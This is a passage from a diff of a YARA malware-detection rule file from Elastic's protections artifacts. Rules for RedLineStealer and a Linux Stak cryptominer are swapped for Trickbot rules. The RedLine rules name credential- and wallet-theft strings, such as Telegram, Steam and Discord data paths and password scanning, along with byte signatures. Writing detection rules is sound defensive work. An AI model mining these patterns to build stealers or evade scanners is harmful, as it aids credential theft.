"get_encryptedUsername" ascii fullword - $b3 = "https://icanhazip.com" wide fullword - $b4 = "GetPrivate3Key" ascii fullword - $b5 = "get_GrabTelegram" ascii fullword - $b6 = "k__BackingField" ascii fullword + $a = { 5B C9 C2 18 00 43 C1 02 10 7C C2 02 10 54 C1 02 10 67 C1 02 10 } condition: - 1 of ($a*) or all of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_F54632Eb : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_93C9A2A4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "f54632eb-2c66-4aff-802d-ad1c076e5a5e" - date = "2021-06-12" + id = "93c9a2a4-a07a-4ed4-a899-b160d235bf50" + date = "2021-03-28" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L29-L56" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25" - logic_hash = "1779919556ee5c9a78342aabafb8408e035cb39632b25c54da6bf195894901dc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L79-L96" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "dadeeba6147b118b80e014ab067eac7a2c3c2990958a6c7016562d8b64fef53c" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0" + fingerprint = "0ff82bf9e70304868ff033f0d96e2a140af6e40c09045d12499447ffb94ab838" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99067,37 +99377,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_F54632Eb : FILE MEMORY os = "windows" strings: - $a1 = "ttp://checkip.amazonaws.com/logins.json" wide fullword - $a2 = "https://ipinfo.io/ip%appdata%\\" wide fullword - $a3 = "Software\\Valve\\SteamLogin Data" wide fullword - $a4 = "get_ScannedWallets" ascii fullword - $a5 = "get_ScanTelegram" ascii fullword - $a6 = "get_ScanGeckoBrowsersPaths" ascii fullword - $a7 = "k__BackingField" ascii fullword - $a8 = "g__HKLM_GetString|11_0" ascii fullword - $a9 = "k__BackingField" ascii fullword - $a10 = "DataManager.Data.Credentials" ascii fullword + $a = { 6A 01 8B CF FF 50 5C 8B 4F 58 49 89 4F 64 8B 4D F4 8B 45 E4 } condition: - 6 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_3D9371Fd : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_5340Afa3 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "3d9371fd-c094-40fc-baf8-f0e9e9a54ff9" - date = "2022-02-17" - modified = "2022-04-12" + id = "5340afa3-ff90-4f61-a1ac-aba1f32dd375" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L58-L82" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a" - logic_hash = "1c8a64ce7615f502602ab960638dd55f4deaeea3b49d894274d64d4d0b6a1d10" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L98-L115" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8b9d3c978f0c4a04ee5b3446b990172206b17496036bc1cc04180ea7e9b99734" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23" + fingerprint = "7da4726ccda6a76d2da773d41f012763802d586f64a313c1c37733905ae9da81" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99105,34 +99405,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_3D9371Fd : FILE MEMORY os = "windows" strings: - $a1 = "get_encrypted_key" ascii fullword - $a2 = "get_PassedPaths" ascii fullword - $a3 = "ChromeGetLocalName" ascii fullword - $a4 = "GetBrowsers" ascii fullword - $a5 = "Software\\Valve\\SteamLogin Data" wide fullword - $a6 = "%appdata%\\" wide fullword - $a7 = "ScanPasswords" ascii fullword + $a = { E8 0C 89 5D F4 0F B7 DB 03 5D 08 66 83 F8 03 75 0A 8B 45 14 } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_63E7E006 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_E7932501 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "63e7e006-6c0c-47d8-8090-a6b36f01f3a3" - date = "2023-05-01" - modified = "2023-06-13" + id = "e7932501-66bf-4713-b10e-bcda29f4b901" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L84-L104" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e062c99dc9f3fa780ea9c6249fa4ef96bbe17fd1df38dbe11c664a10a92deece" - logic_hash = "2085eaf622b52372124e9b23d19e3e4a7fdb7a4559ad9a09216c1cbae96ca5b6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L117-L134" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "f82704a408a0cf1def2a5926dc4c02fa56afea1422c88ba41af50d44c60edb07" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "47c7b9a39a5e0a41f26fdf328231eb173a51adfc00948c68332ce72bc442e19e" + fingerprint = "ae31b49266386a6cf42289a08da4a20fc1330096be1dae793de7b7230225bfc7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99140,30 +99433,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_63E7E006 : FILE MEMORY os = "windows" strings: - $a1 = { 30 68 44 27 25 5B 3D 79 21 54 3A } - $a2 = { 40 5E 30 33 5D 44 34 4A 5D 48 33 } - $a3 = { 4B EF 4D FF 44 DD 41 70 44 DC 41 00 44 DC 41 03 43 D9 3E 00 44 } + $a = { 24 0C 01 00 00 00 85 C0 7C 2F 3B 46 24 7D 2A 8B 4E 20 8D 04 } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_F07B3Cb4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Cd0868D5 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "f07b3cb4-a1c5-42c3-a992-d6d9a48bc7a0" - date = "2023-05-03" - modified = "2023-06-13" + id = "cd0868d5-42d8-437f-8c1a-303526c08442" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L106-L125" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5e491625475fc25c465fc7f6db98def189c15a133af7d0ac1ecbc8d887c4feb6" - logic_hash = "64536e3b340254554154ac1b33adfb4f3c72a2c6c0d1ef27827621b905d431c5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L136-L153" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "053a99e5e722fd2aa1cae96266cc344954f9c3a12d0851fa9d5e95a6420651f4" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8687fa6f540ccebab6000c0c93be4931d874cd04b0692c6934148938bac0026e" + fingerprint = "2f777285a90fce20cd4eab203f3ec7ed1c62e09fc2dfdce09b57e0802f49628f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99171,29 +99461,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_F07B3Cb4 : FILE MEMORY os = "windows" strings: - $a1 = { 3C 65 6E 63 72 79 70 74 65 64 5F 6B 65 79 3E 6B 5F 5F 42 61 63 6B 69 6E 67 46 69 65 6C 64 } - $a2 = { 45 42 37 45 46 31 39 37 33 43 44 43 32 39 35 42 37 42 30 38 46 45 36 44 38 32 42 39 45 43 44 41 44 31 31 30 36 41 46 32 } + $a = { 8D 1C 01 89 54 24 10 8B 54 24 1C 33 C9 66 8B 0B 8D 3C 8A 8B 4C } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_4Df4Bcb6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_515504E2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "4df4bcb6-a492-4407-8d8f-bbb835322c98" - date = "2023-05-04" - modified = "2023-06-13" + id = "515504e2-6b7f-4398-b89b-3af2b46c78a7" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L127-L145" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9389475bd26c1d3fd04a083557f2797d0ee89dfdd1f7de67775fcd19e61dfbb3" - logic_hash = "d9027fa9c8d9c938159a734431bb2be67fd7cca1f898c2208f7b909157524da4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L155-L172" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "5410068e09de4a1283f98f6364ddf243373e228ba060b00699db6323f1167684" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a9e08bf28e8915615f9b39ab814a46c092b5714ef9133f740a1f1f876bfda2d9" + fingerprint = "8eb741e1b3bd760e2cf511ad6609ac6f1f510958a05fb093eae26462f16ee1d0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99201,28 +99489,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_4Df4Bcb6 : FILE MEMORY os = "windows" strings: - $a1 = { 34 42 30 35 43 45 42 44 37 44 37 30 46 31 36 30 37 44 34 37 34 43 41 45 31 37 36 46 45 41 45 42 37 34 33 39 37 39 35 46 } + $a = { 6A 00 6A 00 8D 4D E0 51 FF D6 85 C0 74 29 83 F8 FF 74 0C 8D } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_15Ee6903 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_A0Fc8F35 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "15ee6903-757f-462b-8e1c-1ed8ca667910" - date = "2023-05-04" - modified = "2023-06-13" + id = "a0fc8f35-cbeb-43a8-b00d-7a0f981e84e4" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L147-L166" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "46b506cafb2460ca2969f69bcb0ee0af63b6d65e6b2a6249ef7faa21bde1a6bd" - logic_hash = "22c8a1f4b5b94261cfabdbcc00e45b9437a0132d4e9d4543b734d4f303336696" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L174-L191" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7ab2b45ddfc1d7fa409a6ea3dfd8d4940e1bdf3fc0cb6c7e8d49c60e7bda5b1b" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d3a380f68477b98b3f5adc11cc597042aa95636cfec0b0a5f2e51c201aa61227" + fingerprint = "033ff4f47fece45dfa7e3ba185df84a767691e56f0081f4ed96f9e2455a563cb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99230,29 +99517,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_15Ee6903 : FILE MEMORY os = "windows" strings: - $a1 = { 53 65 65 6E 42 65 66 6F 72 65 33 } - $a2 = { 73 65 74 5F 53 63 61 6E 47 65 63 6B 6F 42 72 6F 77 73 65 72 73 50 61 74 68 73 } + $a = { 18 33 DB 53 6A 01 53 53 8D 4C 24 34 51 8B F0 89 5C 24 38 FF D7 } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_6Dfafd7B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Cb95Dc06 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "6dfafd7b-5188-4ec7-9ba4-58b8f05458e5" - date = "2024-01-05" - modified = "2024-01-12" + id = "cb95dc06-6383-4487-bf10-7fd68d61e37a" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L168-L186" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "809e303ba26b894f006b8f2d3983ff697aef13b67c36957d98c56aae9afd8852" - logic_hash = "888bc2fdfae8673cd6bce56fc9894b3cab6d7e3c384d854d6bc8aef47fdecf1c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L193-L210" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "563b2311d37ace2d09601a70325352db3fcbf135e7ce518965f5410081b5d626" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "b7770492fc26ada1e5cb5581221f59b1426332e57eb5e04922f65c25b92ad860" + fingerprint = "0d28f570db007a1b91fe48aba18be7541531cceb7f11a6a4471e92abd55b3b90" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99260,28 +99545,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_6Dfafd7B : FILE MEMORY os = "windows" strings: - $a = { 33 38 46 34 33 31 41 35 34 39 34 31 31 41 45 42 33 32 38 31 30 30 36 38 41 34 43 38 33 32 35 30 42 32 44 33 31 45 31 35 } + $a = { 08 5F 5E 33 C0 5B 5D C3 8B 55 14 89 02 8B 45 18 5F 89 30 B9 01 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_983Cd7A7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_9D4D3Fa4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "983cd7a7-4e7b-413f-b859-b5cbfbf14ae6" - date = "2024-03-27" - modified = "2024-05-08" + id = "9d4d3fa4-4e37-40d7-8399-a49130b7ef49" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L188-L208" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7aa20c57b8815dd63c8ae951e1819c75b5d2deec5aae0597feec878272772f35" - logic_hash = "2104bad5ec42bc72ec611607a53086a85359bdb4bf084d7377e9a8e234b0e928" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L212-L229" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7c3c9917a95248fd990b6947a0304ded473bf1bcceec8f4498a7955e879d348b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6dd74c3b67501506ee43340c07b53ddb94e919d27ad96f55eb4eff3de1470699" + fingerprint = "b06c3c7ba1f5823ce381971ed29554e5ddbe327b197de312738165ee8bf6e194" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99289,203 +99573,195 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_983Cd7A7 : FILE MEMORY os = "windows" strings: - $decrypt_config_bytes = { 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 72 ?? ?? ?? 70 80 ?? ?? ?? 04 [0-6] 2A } - $str1 = "net.tcp://" wide - $str2 = "\\Discord\\Local Storage\\leveldb" wide + $a = { 89 44 24 18 33 C9 89 44 24 1C 8D 54 24 38 89 44 24 20 33 F6 89 44 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Stak_05088561 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_34F00046 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "05088561-ec73-4068-a7f3-3eff612ecd28" - date = "2021-01-12" - modified = "2021-09-16" + id = "34f00046-8938-4103-91ec-4a745a627d4a" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Stak.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d0d2bab33076121cf6a0a2c4ff1738759464a09ae4771c39442a865a76daff59" - logic_hash = "2b0f8a4efdfb13abcc2a1b43e9c39828ea1de6015fef0ef613bd754da5aa3e9a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L231-L248" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "f9d646645d6726e3aac5cc3eaea9edf1c89c7e743aff7cfa73998a72f3446711" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dfcfa99a2924eb9e8bc0e7b51db6d1b633e742e34add40dc5d1bb90375f85f6e" + fingerprint = "5c6f11e2a040ae32336f4b4c4717e0f10c73359899302b77e1803f3a609309c0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { CD 49 8D 4D 07 48 83 E1 F8 48 39 CD 73 55 49 8B 06 48 8B 50 08 48 8D } + $a = { 30 FF FF FF 03 08 8B 95 30 FF FF FF 2B D1 89 95 30 FF FF FF } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Stak_Ae8B98A9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_F2A18B09 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "ae8b98a9-cc25-4606-a775-1129e0f08c3b" - date = "2021-01-12" - modified = "2021-09-16" + id = "f2a18b09-f7b3-4d1a-87ab-3018f520b69c" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Stak.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "aade76488aa2f557de9082647153cca374a4819cd8e539ebba4bfef2334221b0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L250-L267" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c4c4b0b1df1e8fde87284fb27d46e917c47b479a675fec60faeca6185511907d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0b5da501c97f53ecd79d708d898d4f5baae3c5fd80a4c39b891a952c0bcc86e5" + fingerprint = "3e4474205efe22ea0185c49052e259bc08de8da7c924372f6eb984ae36b91a1c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D1 73 5A 49 8B 06 48 8B 78 08 4C 8B 10 4C 8D 4F 18 4D 89 CB 49 } + $a = { 04 39 45 08 75 08 8B 4D F8 8B 41 18 EB 0F 8B 55 F8 8B 02 89 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Stak_D707Fd3A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_D916Ae65 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "d707fd3a-41ce-4f88-ad42-d663094db5fb" - date = "2021-01-12" - modified = "2021-09-16" + id = "d916ae65-c97b-495c-89c2-4f1ec90081d2" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Stak.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d0d2bab33076121cf6a0a2c4ff1738759464a09ae4771c39442a865a76daff59" - logic_hash = "b825247372aace6e3ce0ff1d9685b6bb041b7277f8967d5f5926b49813cfadc9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L269-L286" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e0aafe498cd9f0e8addfef78027943a754ca797aafae0cb40f1c6425de501339" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c218a3c637f58a6e0dc2aa774eb681757c94e1d34f622b4ee5520985b893f631" + fingerprint = "2e109ed59a1e759ef089e04c21016482bf70228da30d8b350fc370b4e4d120e0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C2 01 48 89 10 49 8B 55 00 48 8B 02 48 8B 4A 10 48 39 C8 74 9E 80 } + $a = { 5F 24 01 10 CF 22 01 10 EC 22 01 10 38 23 01 10 79 23 01 10 82 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Stak_52Dc7Af3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_52722678 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "52dc7af3-a742-4307-a5ae-c929fede1cc4" - date = "2021-01-12" - modified = "2021-09-16" + id = "52722678-afbe-43ec-a39b-6848b7d49488" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Stak.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a9c14b51f95d0c368bf90fb10e7d821a2fbcc79df32fd9f068a7fc053cbd7e83" - logic_hash = "81998164f517b6f1ef72b10227cfff86aa8bbd2b4e2668f946c8ed59696ae74d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L288-L305" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6340171fdde68b32de480f1f410aa4c491a8fffa7c1f699bf5fa72a12ecb77b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "330262703d3fcdd8b2c217db552f07e19f5df4d6bf115bfa291bb1c7f802ad97" + fingerprint = "e67dda5227be74424656957843777ea533b6800576fd85f978fd8fb50504209c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F9 48 89 D3 4D 8B 74 24 20 48 8D 41 01 4C 29 FB 4C 8D 6B 10 48 } + $a = { 2B 5D 0C 89 5D EC EB 03 8B 5D EC 8A 1C 3B 84 DB 74 0D 38 1F } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Stak_Bb3153Ac : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_28A60148 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "bb3153ac-b11b-4e84-afab-05dab61424ae" - date = "2021-01-12" - modified = "2021-09-16" + id = "28a60148-2efb-4cd2-ada1-dd2ae2699adf" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Stak.yar#L80-L98" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b974b6e6a239bcdc067c53cc8a6180c900052d7874075244dc49aaaa9414cca" - logic_hash = "e8516a24358b12863fe52c823ca67f0004457017334fe77dabf5f08d6bf2d907" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L307-L324" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "20a26ed3f0da3a77867597494bf0069a2093ec19b1c5e179c0e7934c1b69d4b9" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c4c33125a1fad9ff393138b333a8cebfd67217e90780c45f73f660ed1fd02753" + fingerprint = "c857aa792ef247bfcf81e75fb696498b1ba25c09fc04049223a6dfc09cc064b1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 6C 77 61 79 73 22 2C 20 22 6E 6F 5F 6D 6C 63 6B 22 2C 20 22 } + $a = { 